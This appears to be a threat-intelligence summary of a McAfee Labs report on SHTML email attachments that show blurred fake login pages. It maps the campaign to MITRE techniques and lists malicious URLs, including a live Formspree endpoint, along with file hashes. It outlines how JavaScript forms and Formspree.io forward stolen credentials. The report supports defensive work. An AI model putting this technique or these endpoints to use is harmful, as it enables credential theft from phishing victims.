McAfee Labs reports a new wave of phishing that abuse server-parsed HTML (SHTML) files delivered as email attachments to lure users with blurred-image login forms. The campaign relies on JavaScript inside SHTML and on back-end form services like Formspree.io to exfiltrate captured credentials. #SHTMLPhishing #Formspree #McAfeeLabs #DHL
Keypoints
- Attackers distribute SHTML files as email attachments to phish users.
- SHTML content uses blurred images loaded from legitimate sites to disguise the phishing page.
- Clicking the SHTML attachment shows a fake document with a login page requiring credentials.
- JavaScript in SHTML is used to generate phishing forms, redirect users, or hide malicious URLs.
- Form submission services (e.g., Formspree.io) are abused to forward captured data to attackers.
- Observed IOCs include specific SHTML-related hashes and several malicious URLs as attack indicators.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment β Attackers victimize users by distributing SHTML files as email attachments. βAttackers victimize users by distributing SHTML files as email attachments.β
- [T1059.007] Command and Scripting: JavaScript β Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior. βAttackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior.β
- [T1056.003] Input Capture: Credentials in Web Forms β When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser β¦ the user must enter his/her credentials. βthe user must enter his/her credentials. In some cases, the email address is prefilled.β
- [T1567.002] Exfiltration to Web Service β Data from submitted forms is sent to a backend service (e.g., Formspree) and forwarded to attacker. βThe attackers use the formspree.io URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method. β¦ data is sent to Formspree.io.β
Indicators of Compromise
- [URL] context β formspree.io/f/xjvderkn, cianindustries[].com/error/excel.php, twenty88[.]com/mincs/mea.ph, sweet.classicbo[.]com/mailb_fixpd.ph
- [URL] context β https://isc.sans.edu, https://i.gyazo.com
- [Hash] 0a072e7443732c7bdb9d1f3fdb9ee27c (shtml(Adobe) β Total Protection and LiveSafe)
- [Hash] 3b215a37c728f65c167941e788935677 (shtml(Excel) β Total Protection and LiveSafe)
- [Hash] 257c1f7a04c93a44514977ec5027446c (shtml(DHL) β Total Protection and LiveSafe)
Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/